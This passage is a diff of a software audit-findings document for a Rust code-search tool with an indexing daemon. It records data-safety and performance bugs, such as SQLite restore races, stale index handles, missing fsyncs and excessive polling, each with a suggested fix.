-- **Description:** When a migration step fails, `migrate()` calls `restore_from_backup(db_path, bak)` which invokes `copy_triplet` → `copy_file_atomic` → `crate::fs::atomic_replace` to rename the backup over the live `db_path`. But the SQLite `pool` from `migrate()`'s caller is STILL holding open file descriptors against the old inode. After the atomic_replace, `db_path`'s inode is the backup's; existing connections in the pool see the *unlinked old* inode, while any subsequent open via the same path sees the new one. Worse, the loop then copies `-wal` and `-shm` over what the pool's open connections believe are *their* sidecars — but those copies land on the new inode while the pool's mapped sidecars (mmap'd) belong to the old inode. The result is silent two-state divergence: in-process queries can read stale rows from the old WAL while readers from new processes see the restored DB. SQLite's documented restore pattern requires closing all connections first (or using the online backup API). Tests in `src/store/migrations.rs:tests` use a fresh temp DB and a single transaction, so the divergence never surfaces. In production a daemon already has a long-lived `Store::open(...)` that owns the pool; if a fresh CLI invocation triggers a migration and fails on a buggy step, the daemon then serves queries from a phantom inode.
-- **Suggested fix:** Drop / close the pool before calling `restore_from_backup` (e.g. take `pool` by value, `.close().await`, then run the restore, then re-open). At minimum, `PRAGMA wal_checkpoint(TRUNCATE)` and force a connection close on every pooled connection before the file replace; document that callers must hold no other Store handles to `db_path` during the restore.
+- **Location:** `src/cli/watch/mod.rs:1102-1122` (DS-W5 reopen)
+- **Description:** When the watch loop detects `cqs index --force` rotated `index.db` (line 1106 `db_id` mismatch), it drops the old `Store`, opens a fresh one, and clears `state.hnsw_index = None; state.incremental_count = 0`. It does NOT reset `state.pending_rebuild`. If a background HNSW rebuild was in flight when the rotation happened, two failure modes follow:
+  1. The rebuild thread opened its own readonly pool via `Store::open_readonly_pooled(&index_path)` (rebuild.rs:240) — it transparently sees the NEW DB content. Good.
+  2. But `pending_rebuild.delta` was populated by the watch loop's `process_file_changes` calls *before* the rotation, with `(id, embedding, content_hash)` triples whose `id` strings reference the OLD DB's chunk IDs. After the rotation, the same id strings may collide with NEW DB chunks that have completely different content. When `drain_pending_rebuild` replays the delta on swap (rebuild.rs:325+), it applies stale embeddings against new IDs. The new HNSW carries the wrong vectors for those IDs until the next threshold rebuild reads SQLite fresh.
+  3. Worse: `delta_saturated` may be inappropriately triggered, causing the rebuilt index to be *thrown away* (rebuild.rs:60-63) even though a clean rebuild against the new DB was perfectly valid. Operator sees `delta_saturated=true` warnings on every threshold rebuild post-rotation until the next `cqs index --force`.
+- **Suggested fix:** In the DS-W5 reopen block, also `state.pending_rebuild.take()` (drop the channel + abandon the in-flight build's outcome). The rebuild thread's `tx.send(result)` becomes a no-op when the receiver is dropped (rebuild.rs:289 already comments "Receiver may have been dropped if the daemon shut down — that's fine"). Force a fresh rebuild on the next threshold tick against the new DB.
 
-#### `stream_summary_writer` bypasses `WRITE_LOCK` — concurrent writer can collide with reindex
-- **Status:** RESOLVED in #1126 PR (write-coalescing queue + `Store::flush_pending_summaries` API).
+#### `run_daemon_reconcile` bypasses `max_pending_files()` cap — drowns the queue on bulk branch switch
 - **Difficulty:** medium
-- **Location:** `src/store/chunks/crud.rs:504-545` (pre-fix); now `src/store/summary_queue.rs` + `src/store/chunks/crud.rs`.
-- **Description:** Every other write path in `Store<ReadWrite>` acquires the in-process `WRITE_LOCK` mutex via `begin_write()`. `stream_summary_writer` instead executes `INSERT OR IGNORE INTO llm_summaries ...` directly against `&self.pool` from a captured `Arc<SqlitePool>` callback that fires from LLM provider streaming threads. Two concrete races:
-  1. A background `cqs llm summary` (or `--improve-docs`) batch is streaming results while the user runs `cqs index` on the same project. The streaming write and `upsert_chunks_and_calls` both contend for SQLite's exclusive lock without the in-process serialization that `WRITE_LOCK` provides. With WAL mode and `busy_timeout=5s` either side can SQLITE_BUSY and abort.
-  2. Multiple in-flight LLM streams (Haiku + doc-comments + hyde concurrently) each fire INSERT OR IGNORE per item; without `begin_write()`, sqlx auto-wraps each statement in its own implicit transaction and commits it individually. That's 1 fsync per row instead of one per batch — already a perf bug, but the data-safety angle is that if the process is killed mid-stream, the partial writes are visible to readers immediately (no transactional grouping).
-- **Resolution:** Added a per-`Store<ReadWrite>` `PendingSummaryQueue` (`src/store/summary_queue.rs`). The streaming callback now enqueues into the queue; the queue flushes synchronously when either the row threshold (default 64) or the time interval (default 200 ms) is crossed, OR when callers (LLM passes, `cmd_index`) call `Store::flush_pending_summaries` explicitly. Flushes drain every queued row inside one `WRITE_LOCK`-guarded transaction with a single multi-row `INSERT OR IGNORE`, restoring the invariant that all `index.db` writes serialize through the same in-process mutex. See `docs/design/1126-1127-lock-topology.md` for the full design rationale.
+- **Location:** `src/cli/watch/reconcile.rs:103, 128` (the two `pending_files.insert` sites)
+- **Description:** The inotify ingest path at `events.rs:108` enforces `pending_files.len() < max_pending_files()` before inserting and increments `dropped_this_cycle` when the queue is full (line 115). This is the documented backpressure. `run_daemon_reconcile` blindly inserts every divergent file into `pending_files` with no cap check. On a `git checkout` of a sibling branch with 50k file changes (or a large monorepo's first-time index population), reconcile pushes the queue size to 50k. Two concrete consequences:
+  1. The queue is now well past `max_pending_files()` (default 5000). The next inotify event hits `events.rs:108`, sees `len() >= max`, increments `dropped_this_cycle` — but the count of "events dropped" is now meaningless because the cap is being held above the line by reconcile, not by sustained event pressure. Operators see persistent `dropped` warnings that have nothing to do with what reconcile actually did.
+  2. The next `process_file_changes` tries to drain 50k files in one batch — `pending_files.drain().collect()` allocates a single 50k-element `Vec<PathBuf>`, then `reindex_files` parses + embeds all 50k synchronously while holding the index lock. The whole point of `max_pending_files()` is to bound the per-cycle work; reconcile defeats it.
+- **Suggested fix:** Pass `max_pending_files()` into `run_daemon_reconcile` and stop inserting once the queue hits the cap. Track skipped count locally and surface it as a `tracing::warn!` so the next reconcile pass picks them up. Alternatively, drain reconcile-queued files in chunks (`take(cap - existing)` per cycle) so the watcher's drain semantics stay intact.
 
-#### Chunk content change does not invalidate `umap_x` / `umap_y` — cluster view serves stale positions
+#### Periodic reconcile reads through stale `store` handle on `cqs index --force` race
+- **Difficulty:** medium
+- **Location:** `src/cli/watch/mod.rs:1262-1283` (periodic reconcile call)
+- **Description:** The periodic reconcile path skips the `db_file_identity` check that `should_process` does at line 1105. If `cqs index --force` rotated the DB while the watch loop was idle, periodic reconcile fires, calls `run_daemon_reconcile(&store, ...)` against the stale store handle (orphaned inode), and reads `indexed_file_origins()` + `source_mtime` from the OLD DB. Files that got newer mtimes in the NEW DB look "stale" against the old store; reconcile queues them as MODIFIED. The next `should_process` cycle reopens the store, drains those queued paths, and re-embeds files that were already current in the new DB. Worst case isn't corruption — it's silent re-work that defeats `--force`'s "I just rebuilt cleanly, you can stand down" semantics.
+- **Suggested fix:** Either (a) add a `db_file_identity` check before each periodic reconcile call and reopen the store if it changed (matching the pattern at line 1105), or (b) acquire a *shared* (read) index lock during reconcile so it serializes against `cqs index --force`'s exclusive lock. Option (a) is the smaller change.
+
+#### `slot remove` does not check whether a daemon is actively serving the slot it deletes
+- **Difficulty:** medium
+- **Location:** `src/cli/commands/infra/slot.rs:322-369`
+- **Description:** `slot_remove` holds `acquire_slots_lock` across `read_active_slot → list_slots → remove_dir_all`, which prevents concurrent CLI invocations from racing each other. But the lock doesn't bind a *daemon* that's already serving from `slots/<name>/index.db`. Concrete failure: `cqs watch --serve --slot foo` is running (holds a long-lived `Store::open` against `slots/foo/index.db` + an HNSW Arc + ~500MB ONNX session). Operator runs `cqs slot remove foo --force`. The CLI acquires the slots lock (the daemon doesn't hold it — it isn't a slot-lifecycle operation), passes the existence check, calls `fs::remove_dir_all(&dir)`. On Linux the unlink succeeds because the daemon's open file descriptors keep the inodes alive — but:
+  - The daemon's WAL checkpoint on next write hits an unlinked-but-open inode; checkpoints work but the rebuilt HNSW persists into the (now-detached) directory tree, which is reaped on daemon exit. Hours of incremental rebuild work vanish silently.
+  - The daemon's BatchContext serves stale snapshots forever — no path notices the directory disappeared until restart.
+  - `fs::remove_dir_all` on `index.db-wal` / `index.db-shm` while another process is mmap'ing them is undefined per SQLite docs (the project's MEMORY.md and the v1.30.0 P2.62 fix document the inverse case). If WSL or any non-overlay FS surfaces an EBUSY or partial removal, the user gets a half-deleted slot dir and no rollback.
+- **Suggested fix:** Before `remove_dir_all`, check `daemon_status(project_cqs_dir)` (the same probe `cqs hook status` uses). If a daemon is up *and* its active slot equals `name`, refuse with a clear error: `bail!("daemon is currently serving slot '{name}'. Stop it first: systemctl --user stop cqs-watch")`. With `--force`, downgrade to a `tracing::warn!` and proceed (operator opt-in). Mirrors the existing `--force` semantics for "this is the active slot" at line 357.
+
+#### `.cqs/.dirty` fallback marker write is not atomic — partial create + crash leaves daemon's existence check ambiguous
 - **Difficulty:** easy
-- **Location:** `src/store/chunks/async_helpers.rs:339-362` (UPSERT) + `src/cli/commands/index/umap.rs:38-228`
-- **Description:** v22 added nullable `umap_x`/`umap_y` columns; `cqs index --umap` runs a UMAP projection over current embeddings and writes coords back via `update_umap_coords_batch`. The `cqs serve` cluster view at `src/serve/data.rs:920-1003` reads these coords directly. Problem: the chunk UPSERT in `batch_insert_chunks` lists every column it overwrites on conflict — embedding, embedding_base, parser_version, etc. — but it does NOT touch `umap_x` or `umap_y`. So when content changes (`WHERE chunks.content_hash != excluded.content_hash`), the embedding gets refreshed but the UMAP coords stay frozen. The cluster view then displays the chunk at a position computed from the old embedding, potentially landing it in a wrong cluster (e.g. function rewritten end-to-end keeps its old coords until the user remembers to run `cqs index --umap`). Worse, `cqs serve` has no way to surface the staleness — the `umap_x IS NOT NULL` filter only catches the all-NULL case. Memory rule: invalidation counters / staleness must be enforced at the schema layer; relying on the user to re-run `--umap` is exactly the call-site instrumentation pattern the project explicitly rejected.
-- **Suggested fix:** Add `umap_x = NULL, umap_y = NULL` to the ON CONFLICT UPDATE clause when content_hash differs. The cluster view's `IS NOT NULL` filter then correctly reports "needs reprojection." Optionally add a metadata `umap_generation` counter that bumps on chunks delete/insert (mirroring `splade_generation`) so a future `cqs serve` warning can fire when generation > umap_generation_at_projection.
+- **Location:** `src/cli/commands/infra/hook.rs:329-332`
+- **Description:** The hook fallback writes the dirty marker with `std::fs::write(&dirty, b"")` — a non-atomic open(O_CREAT|O_WRONLY|O_TRUNC) + write + close. Three failure modes:
+  1. If `cqs hook fire` is killed between `open()` returning and `write()` completing (extremely small window for a 0-byte write but non-zero on slow filesystems), the directory entry exists but with no inode commit. On daemon startup (`watch/mod.rs:594`), `dirty_marker_path.exists()` returns true, the daemon promotes a reconcile, then `remove_file` succeeds — fine. Low risk.
+  2. The bigger gap: if the parent `.cqs/` does not exist, line 330 creates it. If a concurrent process is *also* running `cqs hook fire` and the dirty file already exists with content, the second writer's `O_TRUNC` empties it. No locking, no atomicity, but the daemon only checks existence so this is benign. Acceptable but worth a note.
+  3. The actual concern: there's no fsync after the write (line 331). On a crash + power loss between the hook's `fs::write` and the next fsync of `.cqs/`, the file's directory entry can be lost from the parent directory's metadata — the daemon never sees the marker, the reconcile request is silently dropped. Since `cqs hook` exists *specifically* for the case where the daemon was offline (so the marker is the *only* signal), losing the marker means a `git checkout` post-reboot won't trigger the reconcile that would have caught the bulk diff.
+- **Suggested fix:** Replace `std::fs::write(&dirty, b"")` with `crate::fs::atomic_replace` (the helper already used by `notes.toml`, `audit-mode.json`, and the slot writers post-#P3.39). It writes the temp, fsyncs the file, renames atomically, and fsyncs the parent dir. For an empty file the cost is negligible and the durability guarantee aligns with the marker's role as a crash-recovery breadcrumb.
 
-#### `slot_remove` race: read active_slot → list_slots → remove_dir_all is TOCTOU on concurrent promote
+#### `WatchSnapshot.delta_saturated` is published but `compute()` ignores it — `--require-fresh` accepts a doomed rebuild as `Rebuilding`
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/slot.rs:299-350`
-- **Description:** `slot_remove` reads `active_slot` (line 312), reads `list_slots` (line 313), then `fs::remove_dir_all(&dir)` (line 335). Between any two of those steps a concurrent `cqs slot promote` (or another `slot remove`) can mutate `.cqs/active_slot`. Trigger sequence:
-  1. Process A enters `slot_remove("foo", force=false)`. `foo` is NOT the active slot per its read at line 312 — read says active is "default".
-  2. Process B runs `cqs slot promote foo`, atomically rewriting `active_slot` to "foo".
-  3. Process A proceeds past the active-slot guard (line 316) since its snapshot says active="default", and runs `fs::remove_dir_all(slot_dir(... "foo"))`.
-  4. The system is now pointing `active_slot` at a slot directory that no longer exists. Subsequent commands hit `SlotError::Empty("foo")` until the user manually runs `cqs slot promote default`.
-  Same race with two concurrent `slot_remove` calls competing to remove the only remaining slot. There is no file lock around `.cqs/slots/` lifecycle — `slot_dir` operations rely on plain filesystem semantics.
-- **Suggested fix:** Take an exclusive lock on a `.cqs/slots.lock` file at the top of every `slot_*` operation (mirroring the `notes.toml.lock` pattern in `src/note.rs:209-228`). Hold it for the entire read-validate-mutate sequence. Same pattern in `slot_promote` and `slot_create`.
+- **Location:** `src/watch_status.rs:199-209` (state-machine), `src/cli/watch/mod.rs:160-164` (publish)
+- **Description:** `WatchSnapshotInput.delta_saturated` is plumbed through and serialized on the wire (`watch_status.rs:84-87`), but `compute()` never consults it when picking `FreshnessState`. When a rebuild's incremental delta saturates `MAX_PENDING_REBUILD_DELTA` (rebuild.rs:60-63), the rebuilt HNSW is *discarded* on swap — operators get a `tracing::warn!` line, but the snapshot still classifies as `Rebuilding`. Once the doomed rebuild's `drain_pending_rebuild` runs, `pending_rebuild` becomes `None`, snapshot flips to `Fresh` even though no actual swap happened — the on-disk HNSW is whatever was there before the rebuild started. `cqs eval --require-fresh` accepts this as fresh.
+  This is a duplicate of a finding already filed under Code Quality (`audit-findings.md` "delta_saturated flag is published but ignored by FreshnessState::compute"). I'm pinning it here too because the data-safety angle is distinct: the saturation case is the one where the rebuild silently failed and the fresh-gate is the *exact* contract that's supposed to prevent eval against a stale index.
+- **Suggested fix:** In `compute()`, treat `delta_saturated == true && rebuild_in_flight == false` as `Stale` (the rebuild already discarded, no in-flight work, but the next threshold rebuild hasn't fired yet — caller should wait). Drop the field from the wire shape if it's not going to drive state.
 
-#### Slot legacy migration moves live `index.db-wal` / `-shm` instead of checkpointing first
+#### HNSW rollback path leaves `.bak` files orphaned when restore-rename fails
 - **Difficulty:** medium
-- **Location:** `src/slot/mod.rs:511-624`
-- **Description:** `migrate_legacy_index_to_default_slot` runs idempotently on every `Store::open`. If a legacy `.cqs/index.db` is present and `.cqs/slots/` is absent, it moves `index.db`, `index.db-wal`, and `index.db-shm` (alongside HNSW + SPLADE files) into `.cqs/slots/default/`. But `index.db-wal` may contain uncommitted pages from a *prior* daemon run that crashed before checkpointing. SQLite recovers WAL-mode databases by replaying the WAL on next open — but only if the WAL sits next to the DB on the same inode lineage. After the migration moves all three files atomically the WAL replay still works, but if the moves are NON-atomic (cross-device fallback at `move_file:631-637` does `fs::copy + fs::remove_file`), an interrupt between copying `index.db` and copying `index.db-wal` leaves the new `slots/default/index.db` without its WAL. SQLite reopens that DB and silently truncates / discards uncommitted WAL pages — data loss for any writes that were in flight when the crash occurred.
-- **Suggested fix:** Before the migration, open the legacy `index.db` once with `PRAGMA wal_checkpoint(TRUNCATE)` so the WAL is drained into the main file and the sidecars are empty/absent. Only then move files. This makes the multi-file move's failure modes recoverable: the worst case is a partially-moved index.db, which on restart is detected by the legacy path still existing.
+- **Location:** `src/hnsw/persist.rs:509-553` (rollback block)
+- **Description:** The rollback path (after `atomic_replace` fails mid-rename) iterates `all_exts` and calls `std::fs::rename(&bak_path, &final_path)` for each. If even *one* of those renames fails (line 519 `tracing::error!` arm), the rollback continues to the next extension — but `bak_path` is now in an indeterminate state: some `.bak` files were successfully restored, some are still present alongside their (newly-removed) `final_path`. The next `save_owned` call (line 437) hits `final_path.exists() == false` for those extensions and skips the `rename(final_path, bak_path)` step (line 436 guards on `exists`). It then writes new `final_path`s, and subsequent rollback restores from the *stale* leftover `.bak` files from the prior failed save — silently overwriting a known-good index with a known-bad backup from the previous failure.
+  The rollback fsync at 532-549 is only a `tracing::debug!` on failure, so an audit can't even tell this happened. The `tracing::error!` at line 521 is the only signal, and it doesn't bail — it logs and continues.
+- **Suggested fix:** Track which `.bak` files were successfully renamed back. On any failure, leave the unrenamed `.bak` files in place AND emit a `tracing::error!` with a clear marker (e.g. "HNSW rollback incomplete; manual recovery required: restore .bak files matching {basename}.*.bak") so operators have a recovery breadcrumb. Better: at the start of `save_owned`, if any `.bak` files exist from a previous failed save, refuse the new save with a clear error pointing operators at the recovery step.
 
-#### `model_fingerprint` fallback uses Unix timestamp — every restart misses cache, breaks cross-slot copy invariant
-- **Difficulty:** medium
-- **Location:** `src/embedder/mod.rs:435-465`
-- **Description:** `model_fingerprint()` is the cache key for the cross-slot embeddings cache (per memory: "cross-slot copy by content_hash before A/B reindex saves ~$1-5 in API spend"). The fingerprint is normally a blake3 of the ONNX file. But four error branches fall back to `format!("{}:{}", self.model_config.repo, ts)` where `ts = SystemTime::now()`. Every process restart that hits a fallback writes cache rows under a NEW timestamp, and subsequent reads with a different timestamp miss them. Worse, the cache `(content_hash, model_fingerprint)` PRIMARY KEY treats different timestamps as different models — cross-slot copy by `content_hash` would silently match WRONG embeddings if two slots happened to use the timestamp fallback at different moments (the timestamp fallback for both slots gives different fingerprints, so the cross-slot copy queries would miss the cache entirely; even more concerning is that the fingerprint is used as cache identity across writes, so every fallback embedding becomes orphan, accumulating). The fingerprint is also used in PRAGMA-style metadata records — a stale fingerprint stored in `metadata.embedding_model_fp` will never match a cache write made under the current timestamp.
-- **Suggested fix:** Make the fallback deterministic: `format!("{}:fallback:size={}", repo, file_size_or_zero)` with NO time component. A fallback fingerprint that's stable across restarts is strictly better than a "unique" fallback that fragments the cache. Log loudly at `warn!` so users notice the missing-file path was taken; failing the embedder open is a defensible alternative.
-
-#### `write_slot_model` and `write_active_slot` skip parent-dir fsync after rename
+#### `dropped_this_cycle` reset before snapshot publish hides drop signal — distinct from the code-quality finding because the data-safety angle is "fresh state lies"
 - **Difficulty:** easy
-- **Location:** `src/slot/mod.rs:237-277` (`write_slot_model`), `src/slot/mod.rs:363-406` (`write_active_slot`)
-- **Description:** Both functions write to a temp file, fsync the file (only `write_active_slot` does this — `write_slot_model` only `f.sync_all()`s; both do), then `fs::rename`. Neither fsyncs the parent directory after the rename. On power loss between rename and the next inode/dirent flush, the rename can be lost (returning the user to the previous active_slot or a missing slot.toml). `src/note.rs:304` and `src/audit.rs:149` correctly use `crate::fs::atomic_replace`, which fsyncs both file AND parent dir. The slot writers are the odd ones out — same code shape, weaker guarantees. For `active_slot`, this matters because a `cqs slot promote foo` followed by a power cut can crash the system into seeing the OLD slot active even though `cqs slot promote` returned success — the user re-runs commands assuming the new slot, gets stale results.
-- **Suggested fix:** Replace the bespoke temp+rename in `write_slot_model` and `write_active_slot` with a call to `crate::fs::atomic_replace` (the helper already exists for `notes.toml` and `audit-mode.json`). Removes ~20 lines from each function and gives durable rename semantics.
-
-#### Daemon serializes ALL queries through one `Mutex<BatchContext>` — a slow query (LLM batch fetch, large gather) blocks every other reader
-- **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:1775` (mutex setup), `src/cli/watch.rs:1853-1858` (per-connection thread that takes the mutex)
-- **Description:** `cqs watch --serve` wraps the BatchContext in `Arc<Mutex<...>>` and per-connection threads acquire it for the entire `handle_socket_client` dispatch (line 1856 → `handle_socket_client(stream, &ctx_clone)`). All `cqs <cmd>` invocations from the user's shell — search, callers, scout, gather, even `notes list` — block on this single mutex. A slow path (e.g. `cqs llm summary --batch ...` triggering a Claude Batch poll, or a `cqs gather` BFS over a hostile-shape graph that takes 30+ seconds) blocks every other CLI invocation including `cqs --version` if it goes through the daemon. From a data-safety angle the issue is that with the mutex held, any background job that needs to *write* (like `stream_summary_writer` callbacks fired from a parallel LLM thread inside the BatchContext) waits behind reads. With `WRITE_LOCK` held inside the mutex while the daemon's outer mutex is also waiting, a deadlock surface emerges: thread A holds outer mutex + WRITE_LOCK, thread B (LLM stream) wants WRITE_LOCK but can't proceed; if thread A's transaction is waiting on a rayon pool that thread B's host thread serves, A and B both stall.
-- **Suggested fix:** Two options that match the project's conventions:
-  1. Replace the outer `Mutex<BatchContext>` with `RwLock<BatchContext>`; reader paths take `read()`, the few mutator paths (sweep_idle_sessions, reload notes) take `write()`. Lets concurrent reads parallelize.
-  2. Push the mutex inside `BatchContext` to per-resource locks (one for sessions, one for notes cache, etc.) and reach in only for the specific field a query needs.
-  Either way, audit `stream_summary_writer` carefully — it must NOT be reachable from inside the daemon mutex without going through the `WRITE_LOCK` discipline.
-
-#### `embedding_cache` schema is identical for both `embedding` and `embedding_base` columns — no separation by purpose
-- **Difficulty:** medium
-- **Location:** `src/cache.rs:159-171` (schema), `src/store/chunks/async_helpers.rs:319` (writes)
-- **Description:** The cache stores `(content_hash, model_fingerprint) → embedding`. v18 added `embedding_base` (raw NL embedding before enrichment) but the cache schema does not record WHICH of the two dual-index columns the cached blob represents. The cache is read at the top of every embed batch (in `Embedder::embed_batch_with_cache` or similar) — if the lookup is for "embedding" but the row was written for "embedding_base" (or vice versa), the wrong vector is returned. In practice today both columns are seeded identically on the initial insert (line 319), so it works; but PR #1040's enrichment pass overwrites `embedding` only, leaving `embedding_base` intact. The next reindex hits the cache by content_hash + fingerprint and gets back... whichever row was written last. There's no `purpose` discriminator. If a future change ever caches the post-enrichment embedding, the cache becomes non-deterministic between purposes.
-- **Suggested fix:** Add a `purpose TEXT NOT NULL DEFAULT 'embedding'` column to the cache schema, include it in the PRIMARY KEY and all reads/writes. Costs one migration and one extra bind per query; eliminates the implicit assumption that the same content_hash + fingerprint can only have one meaning.
-
-#### `update_umap_coords_batch` uses TEMP TABLE shared across concurrent calls — DELETE may clear another session's data mid-flight
-- **Difficulty:** easy
-- **Location:** `src/store/chunks/crud.rs:392-450`
-- **Description:** Inside the write transaction, the function does `CREATE TEMP TABLE IF NOT EXISTS _update_umap (...)` then `DELETE FROM _update_umap` (line 401-403). TEMP tables in SQLite are *connection-scoped*, not transaction-scoped: they persist across statements on the same connection. Because the sqlx pool may hand out the same connection to a future `update_umap_coords_batch` call, the second call's `DELETE FROM _update_umap` sees rows from the first call's TEMP table (or the table simply persists across multiple invocations until the connection is dropped). Today this is masked because `WRITE_LOCK` serializes calls. But if a concurrent error path leaves the table populated (e.g. `INSERT INTO _update_umap` succeeds, then the `UPDATE chunks ... FROM _update_umap` fails and the transaction rolls back), the CREATE IF NOT EXISTS sees the leftover, and DELETE clears it — but a DROP TABLE IF EXISTS at the end of the function (line 435-437) is INSIDE the transaction that was just rolled back, so the leftover survives. The next call's INSERT-then-UPDATE then operates on the right shape but the TEMP TABLE is now persistently dirty.
-- **Suggested fix:** Either (a) DROP the TEMP TABLE before CREATE so each call starts clean, regardless of prior state; or (b) use a uniquely-named TEMP TABLE (suffix with random u64) and DROP at end-of-function via a Drop guard so failures still clean up. Option (a) is simpler; SQLite TEMP DROP is cheap and the error path is the rare case.
-
-#### Cache `evict()` size-then-DELETE is in a transaction but the per-row `write_batch()` it competes with is NOT under the same lock
-- **Difficulty:** medium
-- **Location:** `src/cache.rs:408-460` (evict tx with `evict_lock`), `src/cache.rs:354-398` (`write_batch` tx, no `evict_lock`)
-- **Description:** The DS2-5 fix moved the `(SELECT size, AVG, DELETE)` triplet inside one transaction with an in-process `evict_lock` mutex serializing concurrent evicts. Good. But `write_batch` runs in its own transaction without acquiring `evict_lock`. Under WAL mode the evict's BEGIN takes a snapshot at evict-start; a concurrent `write_batch` can commit AFTER the SELECT-size step but BEFORE the DELETE step. The evict's DELETE then deletes some rows just inserted, with no signal to the writer. From the writer's perspective, the embedding write succeeded; from a cross-session read it's a cache miss, and the next embed pass repeats the (potentially expensive) embedding computation. Not corruption — but a confusing perf footgun.
-- **Suggested fix:** Hold `evict_lock` (or the Tokio equivalent) across writes too — every cache mutation goes through one of the two paths, both acquire the same mutex. Costs a per-batch lock acquire (cheap) and eliminates the silent re-embed loop.
-
+- **Location:** `src/cli/watch/events.rs:139-146` (reset) + `src/cli/watch/mod.rs:1303` (publish ordering)
+- **Description:** Already filed under Code Quality (audit-findings.md), but worth re-flagging here for the data-safety implication. `process_file_changes` clears `state.dropped_this_cycle = 0` at line 145 before reindex completes; `publish_watch_snapshot` runs *after* the drain. The snapshot always sees `dropped_this_cycle == 0` even when the cycle that just ran started with a non-zero count. `WatchSnapshot::compute` uses `dropped_this_cycle > 0` as a Stale signal — but the read-after-reset means it never observes a non-zero value at publish time. The dropped files won't be reindexed until the next reconciliation pass (up to 30s later). For data-safety: `cqs eval --require-fresh` is *the* gate that's supposed to prevent eval against a silently-incomplete index. This collapses the gate.
+- **Suggested fix:** See the original finding. Either accumulate `dropped_total` across cycles and only reset after a successful reconcile, or move the reset to *after* `publish_watch_snapshot` in the outer loop.
 
 ## Performance
 
-#### [PF-V1.30-1]: `reindex_files` watch path double-parses calls per file (parse_file_all then extract_calls_from_chunk per chunk)
+#### PF-V1.30.1-1: Daemon publishes watch snapshot every 100ms with a `fs::metadata(index_path)` syscall on each tick
+- **Difficulty:** easy
+- **Location:** `src/cli/watch/mod.rs:149-185` (`publish_watch_snapshot`); called at `src/cli/watch/mod.rs:1303` in the main loop's 100ms tick
+- **Description:** The watch loop calls `publish_watch_snapshot` at the bottom of every iteration of the outer `recv_timeout(100ms)` loop. Inside, line 155 unconditionally does `std::fs::metadata(index_path).ok().and_then(|m| m.modified().ok())` to populate `last_synced_at`. Even when the file hasn't changed, that's a `stat()` syscall every 100ms (~10/sec, ~36k/hour). On WSL `/mnt/c/` 9P this is amplified — a single `stat` on a Windows-side path is 1-50ms; the syscall stream contributes measurable background load on the daemon thread that's documented elsewhere in this codebase as a known WSL pain point. The `last_synced_at` value can only change when this same daemon writes the index, so the metadata read is redundant: the daemon already knows when it has written. (Compare `prune_last_indexed_mtime` in `src/cli/watch/gc.rs:52-62`, which was reworked specifically to avoid per-entry `stat()` calls under the same WSL constraint.)
+- **Suggested fix:** Cache `last_synced_at` as `Arc<AtomicI64>` (or a field on `WatchState`) updated only when the daemon successfully commits a write batch. The publish path then reads the atomic with no syscall. Alternative: throttle the metadata call to once per N ticks (e.g. every 10s) since `last_synced_at` granularity is seconds anyway. The first option is strictly better — zero syscall and exact precision.
+
+---
+
+#### PF-V1.30.1-2: `wait_for_fresh` polls the daemon every 250ms with a fresh socket connect + JSON round-trip
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:2815, 2930-2939`
-- **Description:** The watch reindex calls `parser.parse_file_all(&abs_path)` at line 2815 — this returns `(file_chunks, calls, chunk_type_refs)`, where `calls` is the file-level call graph. The `calls` value is upserted at line 2851 via `store.upsert_function_calls`, then **silently discarded for chunk-level call mapping**. Lines 2930-2939 then loop every chunk and call `parser.extract_calls_from_chunk(chunk)` — which re-runs tree-sitter over the chunk content to extract the same call sites a second time. The bulk pipeline already fixed this in P2 #63 by using `parse_file_all_with_chunk_calls` (returns a fourth `chunk_calls: Vec<(chunk_id, CallSite)>` value from the same Pass 2). The docstring at `src/parser/mod.rs:447-451` explicitly notes "Watch (`src/cli/watch.rs`) still uses `parse_file_all` and runs its own `extract_calls_from_chunk` per chunk; collapsing that into this method is a separate refactor." That refactor never landed. With ~14k chunks per repo-wide reindex (parser.rs note) and one tree-sitter parse per chunk, this is an extra 14k tree-sitter parses per `cqs index` (when the daemon is the indexer) or per touched file's chunks per watch event.
-- **Suggested fix:** Switch the watch path from `parse_file_all` to `parse_file_all_with_chunk_calls`. The fourth tuple element is `Vec<(String, CallSite)>` keyed by absolute-path chunk id; rewrite the ids using the same prefix-strip the watch path already does for `chunk.id` at line 2834, then replace the `for chunk in &chunks { extract_calls_from_chunk(chunk) }` loop with a `HashMap` populated from the returned chunk_calls. Single-line API switch + ~10 lines of id rewriting; cuts reindex CPU roughly in half on the watch path.
+- **Location:** `src/daemon_translate.rs:660-679` (`wait_for_fresh`); per-poll cost in `src/daemon_translate.rs:422-510` (`daemon_status`)
+- **Description:** `wait_for_fresh` busy-polls at a fixed 250ms interval until either `state == fresh` or the deadline expires. With the default `--require-fresh-secs=600`, a stuck-stale tree triggers up to **2,400 socket connects + 2,400 JSON round trips** in a single eval gate. Each `daemon_status` call (a) opens a new `UnixStream` to the daemon socket, (b) serialises a JSON request, (c) writes/flushes, (d) reads a response line, (e) parses it through `serde_json` twice (envelope + payload), (f) closes the socket. The daemon's `dispatch_status` itself is an `RwLock::read().clone()` — microseconds — so virtually all wall time is connect + JSON parse overhead the client pays needlessly. The poll interval doesn't back off: a tree that's been stale for 60s gets the same 4 polls/sec as one that's been stale for 1s, even though the cost of waiting an extra second is identical at both points. `cqs eval --require-fresh` adds this round-trip cost at the head of every eval invocation; an A/B over a fixture that takes 30s to run pays the gate cost once, but a sweep over many slots pays it N times.
+- **Suggested fix:** Two complementary fixes. (1) **Server-side wait**: add a `status --wait <secs>` daemon command that blocks server-side on a `tokio::sync::Notify` flipped by the watch loop when `state` transitions to `fresh`, then returns. One round-trip total instead of N. (2) If client-side polling is preferred for simplicity, **exponential backoff with cap**: start at 100ms, double up to 2s. A tree that's been stale for 30s polls every 2s (~15 polls in the next 30s) instead of every 250ms (~120 polls). Cuts connect/JSON cost ~8× for the long-stale case at zero correctness cost — `is_fresh()` is monotonic in practice, so checking less often only delays the success signal, never misses it.
 
-#### [PF-V1.30-2]: `reindex_files` watch path bypasses the global EmbeddingCache (slot/cross-slot benefit lost on file edits)
+---
+
+#### PF-V1.30.1-3: Periodic GC and reconcile each call `enumerate_files` independently — back-to-back full tree walks within a single tick
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:2876-2887` vs `src/cli/pipeline/embedding.rs:39-62`
